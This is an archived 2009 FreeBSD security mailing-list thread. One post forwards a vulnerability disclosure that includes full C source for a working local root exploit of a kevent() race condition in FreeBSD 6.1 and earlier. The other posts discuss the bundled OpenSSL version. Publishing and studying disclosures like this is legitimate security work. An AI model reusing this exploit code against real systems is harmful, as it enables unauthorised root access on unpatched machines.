From owner-freebsd-security@FreeBSD.ORG Mon Aug 24 18:25:32 2009 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 90E26106568E for ; Mon, 24 Aug 2009 18:25:32 +0000 (UTC) (envelope-from lxn.smth@gmail.com) Received: from mail-vw0-f193.google.com (mail-vw0-f193.google.com [209.85.212.193]) by mx1.freebsd.org (Postfix) with ESMTP id 494F68FC08 for ; Mon, 24 Aug 2009 18:25:32 +0000 (UTC) Received: by vws31 with SMTP id 31so2260374vws.28 for ; Mon, 24 Aug 2009 11:25:31 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=55oDp08+3dV8Qa8kRS6B9DaZ4MiNIHSf4lt7opPI7BI=; b=r6df1SC8dFVpMAy0l3WRPuHEWO/GenW1J36GHmub10TDsWA5pDGrfBLjrsxw+baq+6 JVB1TIVvQyD9+1IvBIu8HxWYdTVaKJpUI5w8pQaOaaq+c/mGClSvJB4jkThq9UIHI8nS 4U5yI42G6uyMTRHAUtJEUfMtVyY+sh2CgqNAU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=N0ArZfOhgxe4nQJ0rkRfa7QOvlnZveupBqxxRs9X0AoEIlDxFFm89F9oW8EvjjkG2X kRCvGsPFlgQrIjPbSakPFpWmfjzfyAapTu9KT+lBWaOn1iJetvuuDgIN6DAEcw15rjgw p6DpbjjmWzsvWFhr1mHGDRKKCXKwAmHVkiPXY= MIME-Version: 1.0 Received: by 10.220.79.9 with SMTP id n9mr6118044vck.4.1251136872242; Mon, 24 Aug 2009 11:01:12 -0700 (PDT) In-Reply-To: <4A90258F.6090606@freebsd.lublin.pl> References: <4A90258F.6090606@freebsd.lublin.pl> Date: Mon, 24 Aug 2009 11:01:12 -0700 Message-ID: <864f75cb0908241101o309219d5x58261bb746eccb78@mail.gmail.com> From: lxn smth To: freebsd-security@freebsd.org Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Mailman-Approved-At: Mon, 24 Aug 2009 21:07:10 +0000 Subject: Re: FreeBSD <= 6.1 kqueue() NULL pointer dereference X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 24 Aug 2009 18:25:32 -0000 FYI. 2009/8/22 Przemyslaw Frasunek : > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > FreeBSD <=3D 6.1 suffers from classical check/use race condition on SMP > systems in kevent() syscall, leading to kernel mode NULL pointer > dereference. It can be triggered by spawning two threads: > 1st thread looping on open() and close() syscalls, and the 2nd thread > looping on kevent(), trying to add possibly invalid filedescriptor. > > The bug was fixed in 6.1-STABLE, just before release of 6.2-RELEASE, but > was not recognized as security vulnerability. > > The following code exploits this vulnerability to run root shell. > > /* 22.08.2009, babcia padlina > ~ * FreeBSD kevent() race condition exploit > ~ * > ~ * works only on multiprocessor systems > ~ * gcc -o padlina padlina.c -lpthread > ~ * > ~ * with thanks to Pawel Pisarczyk for in-depth ia-32 architecture > discussion > ~ */ > > #define _KERNEL > > #include > #include > #include > #include > #include > #include > #include > #include > #include > #include > > #include > #include > #include > #include > > int fd; > int kq; > struct kevent kev, ke[10]; > struct timespec timeout; > int gotroot =3D 0; > > static void kernel_code(void) { > ~ =A0 =A0 =A0 =A0struct thread *thread; > ~ =A0 =A0 =A0 =A0gotroot =3D 1; > ~ =A0 =A0 =A0 =A0asm( > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0"pushl %%eax;" > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0"movl %%fs:0, %0" > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0: "=3Dr"(thread) > ~ =A0 =A0 =A0 =A0); > ~ =A0 =A0 =A0 =A0thread->td_proc->p_ucred->cr_uid =3D 0; > ~ =A0 =A0 =A0 =A0asm("popl %eax"); > ~ =A0 =A0 =A0 =A0return; > } > > void do_thread(void) { > ~ =A0 =A0 =A0 =A0sleep(1); > > ~ =A0 =A0 =A0 =A0while (!gotroot) { > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0memset(&kev, 0, sizeof(kev)); > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0EV_SET(&kev, fd, EVFILT_VNODE, EV_ADD, 0= , 0, NULL); > > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0if (kevent(kq, &kev, 1, &ke, sizeof(ke),= &timeout) < 0) { > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0perror("kevent"); > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0} > ~ =A0 =A0 =A0 =A0} > > } > > void do_thread2(void) { > ~ =A0 =A0 =A0 =A0while(!gotroot) { > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0if ((fd =3D open("/tmp/.padlina", O_RDWR= | O_CREAT, 0600)) < > 0) > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0perror("open"); > > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0close(fd); > ~ =A0 =A0 =A0 =A0} > } > > int main(void) { > ~ =A0 =A0 =A0 =A0pthread_t pth, pth2; > ~ =A0 =A0 =A0 =A0long *ap; > ~ =A0 =A0 =A0 =A0unsigned char *p, *sp; > > ~ =A0 =A0 =A0 =A0if (mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, = MAP_ANON | > MAP_FIXED, -1, 0) < 0) { > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0perror("mmap"); > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0return -1; > ~ =A0 =A0 =A0 =A0} > > ~ =A0 =A0 =A0 =A0memset(0x0, 0xc3, 0x1000); > > ~ =A0 =A0 =A0 =A0for (p =3D 0, sp =3D &kernel_code; *sp !=3D 0xc3;) > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0*p++ =3D *sp++; > > ~ =A0 =A0 =A0 =A0if ((kq =3D kqueue()) < 0) { > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0perror("kqueue"); > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0return -1; > ~ =A0 =A0 =A0 =A0} > > ~ =A0 =A0 =A0 =A0pthread_create(&pth, NULL, do_thread, NULL); > ~ =A0 =A0 =A0 =A0pthread_create(&pth2, NULL, do_thread2, NULL); > > ~ =A0 =A0 =A0 =A0timeout.tv_sec =3D 0; > ~ =A0 =A0 =A0 =A0timeout.tv_nsec =3D 1; > > ~ =A0 =A0 =A0 =A0while (!gotroot) > ~ =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0usleep(100); > > ~ =A0 =A0 =A0 =A0setuid(0); > ~ =A0 =A0 =A0 =A0execl("/bin/sh", "sh", 0); > > ~ =A0 =A0 =A0 =A0printf("exploit failed\n"); > ~ =A0 =A0 =A0 =A0return 0; > } > > > - -- > * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE * > * JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV * > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iEYEARECAAYFAkqQJY8ACgkQkxEnBiV4/K1IRACeI/GYTKhzGqPJLkpheDV8rEIl > yFMAnAo6czNexms9f4zMwUjzAioNRtqz > =3D8qMi > -----END PGP SIGNATURE----- > From owner-freebsd-security@FreeBSD.ORG Thu Aug 27 12:12:45 2009 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id EAF6E106568D for ; Thu, 27 Aug 2009 12:12:45 +0000 (UTC) (envelope-from c.kworr@gmail.com) Received: from mail-fx0-f210.google.com (mail-fx0-f210.google.com [209.85.220.210]) by mx1.freebsd.org (Postfix) with ESMTP id 83B8B8FC1C for ; Thu, 27 Aug 2009 12:12:45 +0000 (UTC) Received: by fxm6 with SMTP id 6so844148fxm.43 for ; Thu, 27 Aug 2009 05:12:44 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=+VB1WZ1rjSRBxDkpgOvkNm2uNm9ZCJ3kk7qVZ1KMlkY=; b=n0ObaR7s0xoInc7Ol2wdt/OZbwS/8UE8QASEtacVmvihmiBSKzKXw/aLjeAbmRf3aX hHnUbdsiNz9ifN1VzaSpz3wtjlBp5sWGLXZnVtUrvixJjTMfr3vLsuedDSFquYgydQgL 34STRMVwcUDPT9/0c+L2bRB6+Gyxx5Aj4pHPs= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=UL/CWNX60nIBg7GNFaFGkEFhZkgn4zj9dZRWMsnINDDFs/Gr/0raq3X2/CjkjTaaWG OsVhH3ozcj9cqmf74x4G2pju/K627Il4tTKsNS2dKNyJg29L3ZedTGjgE4RznaXOz039 Aes5jZzkJBHu4Y9vIM198T+Hqf0azez1lUY34= MIME-Version: 1.0 Received: by 10.204.29.24 with SMTP id o24mr4752236bkc.85.1251373892357; Thu, 27 Aug 2009 04:51:32 -0700 (PDT) Date: Thu, 27 Aug 2009 14:51:32 +0300 Message-ID: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> From: Volodymyr Kostyrko To: freebsd-security@freebsd.org Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Mailman-Approved-At: Thu, 27 Aug 2009 12:52:13 +0000 Subject: bundled openssl version X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 27 Aug 2009 12:12:46 -0000 I'm just puzzled why we still stick to 0.9.8e. It's almost ancient. Why not 0.9.8f? Doesn't someone need TLS extensions working? -- Sphinx of black quartz judge my vow. From owner-freebsd-security@FreeBSD.ORG Thu Aug 27 12:58:12 2009 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id BFE04106568F for ; Thu, 27 Aug 2009 12:58:12 +0000 (UTC) (envelope-from jerome@joworld.net) Received: from mail.joworld.net (anna.joworld.net [88.191.88.29]) by mx1.freebsd.org (Postfix) with ESMTP id 24D928FC33 for ; Thu, 27 Aug 2009 12:58:11 +0000 (UTC) Received: (qmail 95471 invoked from network); 27 Aug 2009 12:58:10 -0000 Received: from unknown (HELO nb03) (127.0.0.1) by localhost.joworld.net with SMTP; 27 Aug 2009 12:58:10 -0000 From: =?iso-8859-1?Q?J=E9r=F4me_Le_Gal?= To: "'Volodymyr Kostyrko'" , References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> Date: Thu, 27 Aug 2009 14:58:03 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Mailer: Microsoft Office Outlook 11 In-Reply-To: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> Thread-Index: AconFTpWSMp7yYQHQ3W8+u7rsWAKUQAAHfHA X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579 Cc: Subject: RE: bundled openssl version X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 27 Aug 2009 12:58:12 -0000 Hi, Why don't you use security/openssl ? -----Message d'origine----- De=A0: owner-freebsd-security@freebsd.org [mailto:owner-freebsd-security@freebsd.org] De la part de Volodymyr = Kostyrko Envoy=E9=A0: jeudi 27 ao=FBt 2009 13:52 =C0=A0: freebsd-security@freebsd.org Objet=A0: bundled openssl version I'm just puzzled why we still stick to 0.9.8e. It's almost ancient. Why not 0.9.8f? Doesn't someone need TLS extensions working? --=20 Sphinx of black quartz judge my vow. _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to = "freebsd-security-unsubscribe@freebsd.org" From owner-freebsd-security@FreeBSD.ORG Thu Aug 27 18:03:17 2009 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 4B7C2106568B for ; Thu, 27 Aug 2009 18:03:17 +0000 (UTC) (envelope-from Gabor@Zahemszky.HU) Received: from relay02.digicable.hu (relay02.digicable.hu [92.249.128.188]) by mx1.freebsd.org (Postfix) with ESMTP id 0CEC48FC33 for ; Thu, 27 Aug 2009 18:03:16 +0000 (UTC) Received: from [94.21.8.183] (helo=Picasso.Zahemszky.HU) by relay02.digicable.hu with esmtpa id 1MginC-0006BR-GR for ; Thu, 27 Aug 2009 19:29:46 +0200 Date: Thu, 27 Aug 2009 19:29:46 +0200 From: Zahemszky =?ISO-8859-2?Q?G=E1bor?= To: freebsd-security@freebsd.org Message-ID: <20090827192946.7f5782c3@Picasso.Zahemszky.HU> In-Reply-To: References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> Organization: Zahemszky Bt. X-Mailer: Claws Mail 3.7.2 (GTK+ 2.16.5; i386-portbld-freebsd7.2) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Original: 94.21.8.183 Subject: Re: bundled openssl version X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 27 Aug 2009 18:03:17 -0000 >> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient. >> Why not 0.9.8f? Doesn't someone need TLS extensions working? > Why don't you use security/openssl ? Why do we need a port, if we can / could use the program from the base system? Zahy < Gabor at Zahemszky dot HU > -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!'; IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ '; set -- $Z;for i;{ [[ $i = ? ]]&&print $i&&break; [[ $i = ??? ]]&&j=$i&&i=${i%?}; typeset -i40 i=8#$i;print -n ${i#???}; [[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;}; IFS=' 0123456789 ';set -- $Z;for i;{ [[ $i = , ]]&&i=2; [[ $i = ?? ]]||typeset -l i;j="$j $i";typeset +l i;};print "$j" From owner-freebsd-security@FreeBSD.ORG Fri Aug 28 07:23:17 2009 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 70EA01065753 for ; Fri, 28 Aug 2009 07:23:17 +0000 (UTC) (envelope-from leccine@gmail.com) Received: from mail-bw0-f206.google.com (mail-bw0-f206.google.com [209.85.218.206]) by mx1.freebsd.org (Postfix) with ESMTP id DE9E990777 for ; Thu, 27 Aug 2009 23:26:24 +0000 (UTC) Received: by bwz2 with SMTP id 2so1215530bwz.43 for ; Thu, 27 Aug 2009 16:26:08 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:cc:content-type; bh=j5LVPC4mTN7qmAjlW4oBh5yyslRQrbtIxZ1fzfDvv1w=; b=lRdE/7t4bLD9JQoRWAkWg9T7xxSjRlYQBceeNm0xlCQEpUM4L1Mf+guXfmRDNkno2T qU/EUwc+98XK8If0jIFd2o6imaEzcGuYGUGVQ+WXyRd6Q590E6bgQFZov+0CgfdKaIDQ daXiuIdOP/oGo0RfzeNWmr+OmzaVC9agj1TdY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; b=EuCsYB4iTLzngc8OBQ8YeXDEOzGa6LLJ0v6EfctdZXweNuAgtKfzektfUpdaHtbWdU nfSaffIxwtZb/SZADsiHyCeEvCNHiFxJZDQnjZdAsxPf6YwGWOHYeWLheJqoDbV0XmOY 49TVzMZoFOxKgQLbJK7j7iO9omxiJLiaGdFms= MIME-Version: 1.0 Received: by 10.204.11.9 with SMTP id r9mr259954bkr.34.1251414211227; Thu, 27 Aug 2009 16:03:31 -0700 (PDT) In-Reply-To: <20090827192946.7f5782c3@Picasso.Zahemszky.HU> References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> <20090827192946.7f5782c3@Picasso.Zahemszky.HU> Date: Fri, 28 Aug 2009 00:03:31 +0100 Message-ID: From: =?ISO-8859-1?B?SXN0duFu?= To: =?ISO-8859-1?Q?Zahemszky_G=E1bor?= Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Cc: freebsd-security@freebsd.org Subject: Re: bundled openssl version X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 28 Aug 2009 07:23:23 -0000 custom flags -O666 and so on:) On Thu, Aug 27, 2009 at 6:29 PM, Zahemszky G=E1bor wro= te: > >> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient. > >> Why not 0.9.8f? Doesn't someone need TLS extensions working? > > > Why don't you use security/openssl ? > > Why do we need a port, if we can / could use the program from the base > system? > > Zahy < Gabor at Zahemszky dot HU > > > -- > #!/bin/ksh > Z=3D'21N16I25C25E30, 40M30E33E25T15U!'; > IFS=3D' ABCDEFGHIJKLMNOPQRSTUVWXYZ '; > set -- $Z;for i;{ [[ $i =3D ? ]]&&print $i&&break; > [[ $i =3D ??? ]]&&j=3D$i&&i=3D${i%?}; > typeset -i40 i=3D8#$i;print -n ${i#???}; > [[ "$j" =3D ??? ]]&&print -n "${j#??} "&&j=3D;typeset +i i;}; > IFS=3D' 0123456789 ';set -- $Z;for i;{ [[ $i =3D , ]]&&i=3D2; > [[ $i =3D ?? ]]||typeset -l i;j=3D"$j $i";typeset +l i;};print "$j" > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.or= g > " > --=20 the sun shines for all